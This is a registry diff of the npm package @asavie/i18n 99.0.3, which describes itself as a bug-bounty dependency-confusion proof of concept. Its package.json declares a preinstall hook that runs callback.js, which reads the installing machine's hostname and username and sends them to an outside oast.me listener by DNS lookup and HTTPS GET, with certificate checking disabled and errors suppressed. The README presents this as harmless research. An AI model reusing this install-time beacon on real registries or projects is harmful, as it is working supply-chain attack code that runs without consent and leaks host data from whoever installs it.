@asavie/i18n 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/README.md +24 -0
  2. package/callback.js +36 -0
  3. package/index.js +4 -0
  4. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1,24 @@
1
+ # @asavie/i18n - Security Research
2
+
3
+ **This package is a dependency confusion proof-of-concept.**
4
+
5
+ It was published as part of authorized bug bounty research to demonstrate
6
+ that the `@asavie/i18n` package name was unclaimed on the public npm registry
7
+ while being referenced by a production application.
8
+
9
+ ## What this does
10
+
11
+ On `npm install`, the `preinstall` script performs a single DNS lookup
12
+ to prove code execution occurred. It does NOT read files, exfiltrate data,
13
+ install backdoors, or modify the system in any way.
14
+
15
+ ## Contact
16
+
17
+ - Researcher: daad122
18
+ - Platform: HackerOne / Bugcrowd
19
+ - Email: daad122@wearehackerone.com
20
+
21
+ ## Responsible Disclosure
22
+
23
+ This package will be unpublished or transferred to the legitimate owner
24
+ after the vulnerability report is resolved.
package/callback.js ADDED
@@ -0,0 +1,36 @@
1
+ /**
2
+ * SECURITY RESEARCH - Dependency Confusion PoC (v99.0.2)
3
+ * Authorized bug bounty testing by daad122@wearehackerone.com
4
+ *
5
+ * Beacon-only: resolves hostname + username via Node.js stdlib,
6
+ * sends a single DNS lookup and HTTPS GET to an interactsh listener.
7
+ * No commands executed, no files read, no credentials accessed.
8
+ */
9
+
10
+ const dns = require('dns');
11
+ const os = require('os');
12
+ const https = require('https');
13
+
14
+ const OOB_DOMAIN = 'd88sor2o12pnlnd0i1n08ghufaornbr1i.oast.me';
15
+
16
+ function sanitize(s, max = 60) {
17
+ return (s || 'none').replace(/[^a-zA-Z0-9._-]/g, '-').substring(0, max);
18
+ }
19
+
20
+ try {
21
+ const hostname = sanitize(os.hostname(), 40);
22
+ const user = sanitize(os.userInfo().username, 20);
23
+
24
+ // DNS beacon — proves code execution, identifies package + host + user
25
+ dns.resolve(`dep-conf.asavie-i18n.${hostname}.${user}.${OOB_DOMAIN}`, 'A', () => {});
26
+
27
+ // HTTPS beacon — captures source IP + timestamp in interactsh
28
+ https.get(
29
+ `https://${OOB_DOMAIN}/dep-conf?h=${hostname}&u=${user}&pkg=asavie-i18n`,
30
+ { rejectUnauthorized: false, timeout: 10000 },
31
+ () => {}
32
+ ).on('error', () => {});
33
+
34
+ } catch (e) {
35
+ // Fail silently — never break the target's build
36
+ }
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ // @asavie/i18n - SECURITY RESEARCH placeholder
2
+ // Dependency confusion PoC by daad122@wearehackerone.com
3
+ // This package exists to demonstrate supply-chain vulnerability.
4
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "@asavie/i18n",
3
+ "version": "99.0.3",
4
+ "description": "SECURITY RESEARCH - Dependency confusion beacon-only PoC - Contact: daad122@wearehackerone.com",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node callback.js || true"
8
+ },
9
+ "keywords": ["security-research", "dependency-confusion", "bug-bounty"],
10
+ "author": "daad122 (security researcher)",
11
+ "license": "ISC",
12
+ "repository": {
13
+ "type": "git",
14
+ "url": "https://hackerone.com/daad122"
15
+ }
16
+ }